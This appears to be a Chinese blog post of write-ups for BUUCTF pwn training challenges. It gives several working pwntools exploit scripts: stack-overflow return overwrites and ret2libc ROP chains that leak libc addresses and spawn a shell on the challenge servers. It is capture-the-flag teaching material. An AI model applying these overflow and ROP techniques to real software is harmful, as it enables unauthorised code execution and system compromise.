buuctf——pwn刷题之旅(持续更新)

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量370 收藏 4
点赞数
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42988973/article/details/128340255
版权

文章目录

连上就有flag的pwn

1568305685314

RIP覆盖一下

1568307672397

IDA看一下:

1568307909466

典型的溢出,函数中有fun函数:

1568307994407

看一下偏移:

1568308011545

有一个需要注意的地方就是nc连上发现没有输出input,直接让我输入,所以exp改了一下。

exp:

from pwn import *

p = remote('pwn.buuoj.cn', 6001)
#p = process('../files/pwn1')

payload = 'a' * (0xf + 8) + p64(0x401186)
p.sendline(payload)
p.interactive()

得到flag:

1568308290836

ciscn_2019_c_1

还是个64位的ELF,IDA分析一下:

main函数里没有啥:

1568359070246

encrypt()函数里存在栈溢出:

1568359126837

由于程序中没有system和sh所以ROP攻击。

思路是通过栈溢出返回程序中的puts函数把gets函数的地址泄露出来,然后找到偏移地址,再调用system和/bin/sh来获得shell。

看一下s:

1568359326141

exp:

from pwn import *
from LibcSearcher import *

#p = process('../files/ciscn_2019_c_1')
p = remote('pwn.buuoj.cn', 20115)
e = ELF('../files/ciscn_2019_c_1')

start = 0x400B28
rdi_addr = 0x0000000000400c83

puts_plt = e.plt['puts']
gets_got = e.got['gets']

log.success('puts_plt => {}'.format(hex(puts_plt)))
log.success('gets_got => {}'.format(hex(gets_got)))

p.sendlineafter('choice!\n', '1')

payload1 = 'a' * (0x50 + 8)
payload1 += p64(rdi_addr) + p64(gets_got) + p64(puts_plt)
payload1 += p64(start)

p.sendline(payload1)

p.recvuntil('@')
p.recvline()
gets_leak = u64(p.recvline()[:-1].ljust(8, '\0'))
log.success('get_leak_addr => {}'.format(hex(gets_leak)))

libc = LibcSearcher('gets', gets_leak)
libc_base = gets_leak - libc.dump('gets')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
log.success('libc_base_addr => {}'.format(hex(libc_base)))
log.success('system_addr => {}'.format(hex(sys_addr)))
log.success('bin_sh_addr => {}'.format(hex(bin_sh_addr)))

p.sendlineafter('choice!\n', '1')

payload2 = 'a' *(0x50 + 8)
payload2 += p64(rdi_addr) + p64(bin_sh_addr) + p64(sys_addr)

p.sendline(payload2)
p.interactive()

运行得到flag:

1568359451505

warmup_csaw_2016

看一下源码:

1568359953444

很明显的栈溢出。程序中还有这个:

1568359977736

没啥说的了,直接上exp:

from pwn import *


p = remote('pwn.buuoj.cn', 20035)

payload = 'a' * (0x40 + 8)
payload += p64(0x40060d)

p.recvuntil('>')
p.sendline(payload)

p.interactive()

得到flag:

1568360050956

pwn1_sctf_2016

分析源码:

1568381486365

第13行发现传入的s被限制在了31个字符,没法溢出,但是接着看发现当输入I的时候,程序会把I变成you,这样一来原本一个字符就变成了三个字符,可以溢出了!

发现程序中有get_flag函数:

1568381665781

那么思路就是溢出让程序返回get_flag函数。

动态调试查看输入的起始地址为FFCD1D48(you是程序运行自己修改的):

1568381364714

程序返回地址存放的位置为FFCD1D90:

1568381400442

所以偏移量就是90-4C-4=0x40=64,那么就需要填充64个字节,所以构造21个I加一个A,exp如下:

from pwn import *

#p = process('../files/pwn1_sctf_2016')
p = remote('pwn.buuoj.cn',20086)
e = ELF('../files/pwn1_sctf_2016')

get_flag = e.symbols['get_flag']
log.success('get_flag_addr => {}'.format(hex(get_flag)))

payload = 'I' * 21 + 'A' + p32(get_flag)

p.sendline(payload)
print(p.recv())

得到flag:

1568382235211

ciscn_2019_en_1

和ciscn_2019_c_1一模一样,exp改个端口号就行了。

ciscn_2019_n_1

源码很简单:

1568388929535

就是一个简单的溢出让v2变成11.28125。v1是var_30,v2是var_4:

1568389165705

1568389212921

再看一下11.28125在程序中的表示:

1568389275163

也就是让v2变成41348000h,所以exp如下:

from pwn import *

#p = process('../files/ciscn_2019_n_1')
p = remote('pwn.buuoj.cn', 20137)

payload = '1' * 0x2c + p64(0x41348000)
p.recv()
p.sendline(payload)
p.interactive()

1568386840196

我去{{tuxue}},居然告诉我没有flag,可能是出题的时候环境配的有问题吧,或者是就是个坑。

不过没关系,那就ROP,具体没啥好说的和前几道题都差不多,,不多说了。

exp:

from pwn import *
from LibcSearcher import *


#p = process('../files/ciscn_2019_n_1')
p = remote('pwn.buuoj.cn', 20137)
e = ELF('../files/ciscn_2019_n_1')

rdi_addr = 0x0000000000400793
start = 0x4006DC

puts_plt = e.plt['puts']
gets_got = e.got['gets']
log.success('puts_plt => {}'.format(hex(puts_plt)))
log.success('gets_got => {}'.format(hex(gets_got)))

payload1 = 'a' * (0x30 + 8)
payload1 += p64(rdi_addr) + p64(gets_got) + p64(puts_plt)
payload1 += p64(start)

p.sendline(payload1)

p.recvuntil('11.28125\n')
gets_leak = u64(p.recvline()[:-1].ljust(8,'\0'))
log.success('gets_leak_addr => {}'.format(hex(gets_leak)))

libc = LibcSearcher('gets', gets_leak)
libc_base = gets_leak - libc.dump('gets')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
log.success('libc_base_addr => {}'.format(hex(libc_base)))
log.success('system_addr => {}'.format(hex(sys_addr)))
log.success('bin_sh_addr => {}'.format(hex(bin_sh_addr)))

p.recvline()

payload2 = 'a' * (0x30 + 8)
payload2 += p64(rdi_addr) + p64(bin_sh_addr) + p64(sys_addr)

p.sendline(payload2)

p.interactive()

取得shell,得到flag:

1568423814631

winny1001
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-pwn刷题记录(22-7-30更新
Morphy_Amo的博客
03-04 4260
BUUCTF刷题记录
buuctf pwn刷题(1)
清霂的博客
01-30 1014
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 1916
经典栈溢出漏洞。
BUUCTF pwn
L0g1c的博客
01-30 1532
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF-PWN
weixin_52125240的博客
12-04 1260
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
buuctf习题pwn(2~10)
yw__y的博客
03-30 854
BUUCTFPWN(WP1)
NANMUZN的博客
01-15 590
buuctf pwn
buuctfpwn
个人笔记
04-04 2620
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1001
buuctf pwn
pwn学习总结(八)—— 堆(持续更新
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
[BUUCTF]Pwn刷题记录
x0r
10-13 196
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1609
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1283
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
攻防世界XCTF-Pwn入门11题解题报告
ailx10
03-15 1480
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录 ~第一题:level0解题报告:首先看看这个程序是啥呗,哦64位Linux可执行程序:IDA看看逻辑,输出一个hello world然后就...
软件安全实验二——pwn
最新发布
09-12
关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会学习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值